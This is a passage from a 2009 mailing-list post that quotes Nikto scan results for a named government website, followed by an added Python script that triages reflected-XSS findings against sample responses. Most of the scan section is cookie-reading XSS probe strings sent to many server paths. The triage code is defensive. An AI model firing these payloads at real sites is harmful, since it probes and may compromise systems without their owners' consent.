script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?<br>
path=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a><br>
.<br>
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?<br>
name=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default<br>
script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=123&amp;bar=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?func=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?pkg=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?pkg=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5107: GET /netutils/findata.stm?host=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5107: GET /netutils/findata.stm?user=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?query=&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-701: GET /pls/dadname/htp.print?cbuf=&lt;script&gt;alert(&#39;Vulnerable&#39;)&lt;/script&gt; : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank">http://www.cert.org/advisories/CA-2000-02.html</a>.<br>
+ OSVDB-20954: GET /shopadmin.asp?Password=abc&amp;UserName=\&quot;&gt;&lt;script&gt;alert(foo)&lt;/script&gt; : VP-ASP Shopping Cart 5.50 shopadmin.asp UserName Variable XSS.<br>
+ OSVDB-20406: GET /phpinfo.php?GLOBALS[test]=&lt;script&gt;alert(document.cookie);&lt;/script&gt; : PHP contains a flaw that allows a remote cross site scripting attack.<br>
+ OSVDB-24484: GET /phpinfo.php?<br>
cx<br>
[]=<br>
IABfYtCLNw0eFSopw7pztAMoYBk4HrLkyLRuO6sjTJBRVhDP5y1SU5kV25VBcSRVh28H1dOO<br>
UNRzY7ZIjkOGmUnQovnJSahmxGTRVyDr0FoD7RpuIa2eSighiMGwdHQucM8c5xl4cLJdZnw0<br>
B6c12hcXnT2cJji9pBrUNJ2JDjYAMtnBtXsOYW8OYRWphRHYu2W1Po4L3DEZD0QcIsfTSPqY<br>
SQLnQD0oCSJJNzSt3D5AWhcUfjHajiL34Q9lckJjqilRz8fplgSdF6lrgFbpX6VNRsF1hJQ0<br>
f5ABtDwiSn03HX965MEreLIXXmvmt5OOk7rBrRyi7h19gUAIZUdqehPI3Nghi9JSNwpgTdtd<br>
TUOY5GSU9nl1DDP9iJOIhPMKtaOfL3aYDAvzZklAJ5lPWA8l89pCdGz4oOxt3vHS9kW41eux<br>
QYGsyf3xhSBotT22lwS4DugiF0dyWDEiN0e3k0LQWBC2L2040RFSC9b6uJWjzqSjd7BuWez6<br>
4ttWYwsb7ez2PmxtWjrA7Ao2rHoNAeMi4MunrDpwb2FZZWEyZQCzzOhDI0nuI671rkHtiltC<br>
o5cyUDfrWo0X5JRtI4J0XOLxLRs4gJ8XQDAytUDT0RfFiv5aYGb455EXN57Vs4w49LClAEjz<br>
TLMgQQLzrHabfEEYTRNWJK3ZlsV4PvLVds7typSb4yVY8c2Em1eBZvym0YBFi7Gw19el2NrB<br>
x2CNtGDQlaNt2SfFTP9DX9ga2fqwVDMiUbk7wulIygwYmI3mF9vHc83m6BthlyduyGc7MMpI<br>
xfk7vX2Z8Ir0XYNAhdcAh62lTai5FJ0MLcaDsy2eFd5j7zNWbCjP3v8hs5I8D0B4iKwZmwhT<br>
ZeKQjOpCXIGJAvKAPtqDY6yJg2LIwluUkzMV3N0DyzOU2VV2IkiTgYzlTJMLCdMgMcZmosUt<br>
vnRwWq246SSEqmnloNyeaT1P1uWIJq046uOySQ8MukoSlCg7mbZQlj6ivbG5fcjy7BepKPhp<br>
5Isdk7Q62nI1NHDTDBB3uA0pL00Ui1CRg7ZRT8zw6N2J5BxbBAAUxxFln2SAoBGzPTV2tpFe<br>
j00I3o0KgIicobVDfwWBIgbqCu2Rv6G0FYxIExqTC9MrPd7gasMOTz96U5AZlus5tSCYPwId<br>
eSddAACh8FEofVzkcS9nHYPcR9LJXvxgqzXu1s66NNlJZDiCGf83IWCGb1h3cuX1jHEaXujc<br>
346TQLz19tBUHNkb1gYzmrWszrRZatYpmzagn7KjDoHqsYnwTtBCPLnRbOxzW5aPefkMBTA0<br>
tysFi5IWDwPf0IUrOs7WoeIjpoaohvM34tbTAZbHyCLHBmfwaOr2InetfRp5w8agZ88C35f0<br>
9saFFdhX2PfOer1tNNN4al2o0KSnzpicCXf2nBLoeaDetPF2285Jlv64gNYIJ8Cr0cXuzFOy<br>
jVU00QyrQoEtQlG8obeYTICu8S3x53LiaEv49k0O8zfuJ4t5VQjnYsW41WymJh4XidoMEGr7<br>
I7drFRCRtfYSPNLjiO089Kwi6Mf6b9XHfXZXBScBfCCeeZXQVKadjxnHMwreGq9t2QYb5v9X<br>
rRrUyvsO4KqKWGV5fGFhIvfxUwJZTkE9SaXbXHvEaCE3qn0YBjgAsSrCNgDjq7JJrC84os5P<br>
aITCKxPnNapQV3INznFdmHBbV5KxZUfb0FoJ0qNIGuLRDlG6tULYWQ2SBlzpo9AreOsLMAHF<br>
fVfsDSTqQjmVKUuccADCk4CaQHD97JOYpf3zV7mjqutn1Ck2AOkacdsTigTQv2rcOdQJcurY<br>
YENagxK5PVIqXF5NMZVHjumvhihO6nTjuwAsLLUR8Fr8Y2cxuSr9hqBecxATEmg2Evr26ayv<br>
Y22H6qAtqhPRrehFFfzDgYDSW6QSJY356LSiOxTgXDxOakGuwOEEZqwRYgIjsRMRUgi8BKeI<br>
Z2X8y7pu1lkufUaGx3wgZp0ZvzuEggY22D1t0oOTBzzsR16cKfEhA08dgFIQDolnC0dc8zm1<br>
8kN9tFSSYdaBo9k01X0q8HnHMdrXMwyymxITp1gwWHQRgiDEGbkcGsA5VYdgx6uZMEJIS4CP<br>
u0F13RpKCdlkxPV7BmGkbm7YFwenqaxlwYzSp2hNrrpIzvwXOK3PJqaBBTtU7eR7IkBIaDl4<br>
sbjgeXOobiP9q1FBaif7ENUSnZiG1H0BDrbn45hxAvkrfMgG7sfGcRYOTBGc2fXx7Qhc6Kzy<br>
Kuf4p20uD5beqAcVCZf3gGQrnPK8sou1gfkZpxXZcqAY4HD0b4EJiu67V2nd3D4juG1xZCni<br>
pXqgBNH38qpcUopkp7kBw9CE5Aw2K8DUzRdOGlKwirh3wTj1FrLX2gV9emuSz5Fx6LcOAB9T<br>
fdG7YqxuQqF4FUkurMjsKZfcI8VCidq1tJGmUBuXxMfdkn2Fnn5wXFJ1y3LtLJQRNaffCfgc<br>
cfONpofjRY0nQ3IcXAZIONe7tgQunx2wfm4N5Uu89Oyztm2FauK15k31oLlejRWMHDYq3iUQ<br>
lM5kwfL5OAzcGcM465rrNOcPrN0EcfCj0ddzegxngnNTX7DaTY73eUNTRvQQA51aYXDCWpRz<br>
DwxZORtpJtR2wpxtoZHijNlykSCwKYNmSovOkK3kcENmQUw6eiV2RlUsGy62tnxJnpt6OyxY<br>
gRyTa3SHVofk8RN6pzncOmoxHHwK6spgcN95WSeGoQkt46cWn1jHOgM3NqVfuFmecQwGFrcN<br>
xsZpZF7HzpjDxwtlmhU5IVVv8q8dD0FCmpFwpzQ3dSFe5bTSJVWDEIVK5z9xty6MPoDjDDDm<br>
IXMTHXIGPpU52pAm1rNZSLEW29kcW5kXdpEbmZrWJAQZZ3FX6eeOapijdazij36wWJj9lao7<br>
dvFzt83loQw73bKd2GRdSj683IxDmpwiWOeUsVu9Y1i2aUrSLMsP2PlguIrVCeMoH9wOiTMS<br>
rfnuSlcqHWHaYEns8Vpcppem9seqBG2M3778M49aqD0hbxa00lQBNTKcKqiLl0s55vNVzf8W<br>
qi85aWZjUOm2ENsg9J1MtjdYN5yRumpOpo7egMjeVDGiKHH5FsZtPjHYFKyieLZP8Wv7zsI4<br>
ts1mu1SxolEvvb1dioAxqn3cRWdH1LUCcyeLozEIfcFNtIRQywUUvYcpctFAC1HMmnh5lkaT<br>
L1XJN4vughA4eNCMMAJRG34kcFIJCpzmMuyhSEhSfiZ0vGa3iNFdstb9DHeFB5xkM3XKzn8q2SS3Ywnmbz3RyHDD05pskb6Chmvp87F3D9xGSendRdIDKorHcLtjLnvxOleN0DfS8tylx4HRxPxYNxoIJx5rN2nrXBAXGFHhqKKYiuXIxLo5t14ekOvm1QQvQvMa9kTGH7xH2ez9mWRWxLlGkOuxgT7gXwYLtT1NZvx849dj1S7taqpzB4AXQORick0s9OPDyuMOG2ojfqzC6HkZsoj8I55Bj37Ci1mOk5Tj2kHt1fMzm0erQ1CV4BTgGr1bOCOMcVYtKQ9ZT8XRCWQYImeM4lEHe17soKTkk8ziJgksDTOzd7MJxSpVZa3jXf5ykV9ViOb1RMz4E76AODaF5wlSp1GytGoLmsXnj90ILoRxPzjLx3ZSmnaTTWhy84rwcnsof618wqPC6ucd31ITEOEMFDG8bxwjdvYlJLvfuExAintARfREZOgDMSucADj9B0G24dRKVHg4ZMagEjzxtV50msaQNsp5RXxCebHmT04VqBmPVGh0ci8OgRaz8Ha8LysvB5rgU2uzqktctGpeShtQMChihPHozkSuTT62LaOfAPSanAYoagD0Pj5wiZdyLVvMMsB0fKFIf5bAGEv4N2Z3efEfFfoqYSthIAbU1Ma0LmPVEoF76hpajXi2Zqc3wZzRnyq0fNatIyitMEcJBEJWH0zSGhJP6P0JqrqBuwkXfLzZcXC3X2Ggx0n6irr42zjSPRrSpyfhq6mW0MlPTmyCEKjdOsnHM7vDrvMiFNcRJLx8TVjFzAfcluZKDL0oTEGhlbc7y5cyulg4MVgqPdey6wNVuFLKgeJKatoCYrxFymlxHvr60XIWOOwu4il1XYqnm17t3wEhS0k1B4OTv7Oj1Qrg<br>

&lt;script&gt;alert(foo)&lt;/script&gt; : PHP 5.1.2 and 4.4.2 phpinfo() Function<br>
Long Array XSS<br>
+ OSVDB-35935: GET /rpc.php?q=\&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.<br>
+ 3577 items checked: 216 item(s) reported on remote host<br>
+ End Time:        2009-09-05 1:09:01 (444 seconds)<br>
---------------------------------------------------------------------------<br>
+ 1 host(s) tested<br>
<br>
Test Options: -h <a href="http://www.mardi.gov.my" target="_blank">www.mardi.gov.my</a> -output mardi.txt<br>
---------------------------------------------------------------------------<br>
Maybe someone might share this result and give your comments about<br>
this. Your comments are needed, and I hope we can do something about it.<br>
Thanks<br>
Mohd Fazli Azran<br>
PCBSD Malaysia<br>
<br>
<br>
<br>
_______________________________________________<br>
PCBSD-malaysia mailing list<br>
<a href="mailto:PCBSD-malaysia@lists.pcbsd.org">PCBSD-malaysia@lists.pcbsd.org</a><br>
<a href="http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia" target="_blank">http://lists.pcbsd.org/mailman/listinfo/pcbsd-malaysia</a><br>
</blockquote></div><br>
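<p>A triage check for findings like the reflected-XSS entries in the quoted scan, added here as an example; it is not part of either message above and not the scanner's own code. Nikto reports these checks on a string match against the response, so a hit is not yet a confirmed vulnerability: the quoted report names Sambar Server, Oracle 9iAS, VP-ASP and phpMyAdmin scripts on a host whose banner says lighttpd, which is the pattern a server that answers 200 with the same page for every path produces. The block parses unwrapped Nikto finding lines, splits the payload out of the query string, and classifies each hit against its response and a baseline response for a path that certainly does not exist: payload reflected verbatim, reflected only HTML-escaped, identical to the catch-all page, or not found. The scan lines, the responses in <code>SAMPLE_RESPONSES</code> and the baseline are constructed for the example and stand in for live requests; the 'confirmed' verdict still means "worth a manual look in a browser", not "exploited".</p>

```python
import html
import re
from urllib.parse import unquote, urlsplit

# One unwrapped Nikto finding line, e.g.
# + OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=<script>... : Sambar Server default script ...
FINDING_RE = re.compile(
    r"^\+\s+(?P<id>OSVDB-\d+):\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+:\s+(?P<desc>.*)$"
)

# Constructed sample report in Nikto's line format (four checks of the kind a
# default scan runs); not the scan output from the original message.
SAMPLE_SCAN = """\
+ Server: lighttpd/1.5.0
+ OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-701: GET /pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-20406: GET /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains a flaw that allows a remote cross site scripting attack.
+ OSVDB-35935: GET /rpc.php?q="><script>alert(document.cookie)</script> : Unobtrusive Ajax Star Rating Bar is vulnerable to XSS in the q variable.
"""

# The page a catch-all server returns for any unknown path (constructed).
GENERIC_PAGE = "<html><head><title>Welcome</title></head><body>Portal home</body></html>"

# Constructed responses keyed by path: (status, body). In real use these come from
# fetching each finding's URL; no live HTTP client is included here.
SAMPLE_RESPONSES = {
    # Parameter echoed back unencoded: a real reflected XSS.
    "/netutils/ipdata.stm": (200, "<html><body>No data for <script>alert(document.cookie)</script></body></html>"),
    # Echoed back HTML-encoded: the scanner's string match still fires, but nothing executes.
    "/pls/dadname/htp.print": (200, "<html><body>&lt;script&gt;alert(&#x27;Vulnerable&#x27;)&lt;/script&gt;</body></html>"),
    # Catch-all: the script does not exist, the server just serves its landing page with 200.
    "/phpinfo.php": (200, GENERIC_PAGE),
    # Honest 404.
    "/rpc.php": (404, "<html><body>404 - Not Found</body></html>"),
}
# Baseline: what the same server returns for a random path that certainly does not exist.
SAMPLE_BASELINE = (200, GENERIC_PAGE)


def split_query(query):
    """Split a query string on '&' only and percent-decode each side.

    urllib's parse_qsl is avoided because older Pythons also split on ';',
    which appears inside XSS payloads such as alert(document.cookie);.
    """
    params = []
    for pair in query.split("&"):
        if "=" in pair:
            name, value = pair.split("=", 1)
            params.append((unquote(name), unquote(value)))
    return params


def parse_nikto_findings(text):
    """Turn Nikto '+ OSVDB-nnnn: METHOD url : description' lines into dicts."""
    findings = []
    for line in text.splitlines():
        m = FINDING_RE.match(line.strip())
        if not m:
            continue  # server banner, item counts, timing lines
        parts = urlsplit(m["url"])
        findings.append({
            "id": m["id"],
            "method": m["method"],
            "path": parts.path,
            "params": split_query(parts.query),
            "desc": m["desc"].strip(),
        })
    return findings


def classify(finding, status, body, baseline_status, baseline_body):
    """Classify one finding against its response and the not-found baseline.

    Returns 'not-found', 'catch-all', 'confirmed', 'escaped' or 'unreflected'.
    """
    if status != 200:
        return "not-found"
    if baseline_status == 200 and body == baseline_body:
        return "catch-all"  # same page as a nonexistent path: the hit is noise
    payloads = [v for _, v in finding["params"] if "<" in v or '"' in v]
    if any(p in body for p in payloads):
        return "confirmed"  # markup reflected verbatim into the page
    if any(html.escape(p, quote=True) in body for p in payloads):
        return "escaped"  # reflected, but neutralised by output encoding
    return "unreflected"


def triage(scan_text, responses, baseline):
    """Map finding id -> classification for every finding in a Nikto report."""
    results = {}
    for f in parse_nikto_findings(scan_text):
        status, body = responses.get(f["path"], (404, ""))
        results[f["id"]] = classify(f, status, body, baseline[0], baseline[1])
    return results


if __name__ == "__main__":
    for fid, verdict in triage(SAMPLE_SCAN, SAMPLE_RESPONSES, SAMPLE_BASELINE).items():
        print(f"{fid}: {verdict}")
```

<p>To use it against a real report, unwrap the e-mail line breaks first (each finding on one line) and replace the <code>responses</code> dict with the bodies fetched for each URL plus one fetch of a random nonexistent path as the baseline. The catch-all test compares whole bodies, so on a site that embeds a timestamp or CSRF token in every page, normalise those out before comparing or the verdict degrades to 'unreflected' rather than 'catch-all'.</p>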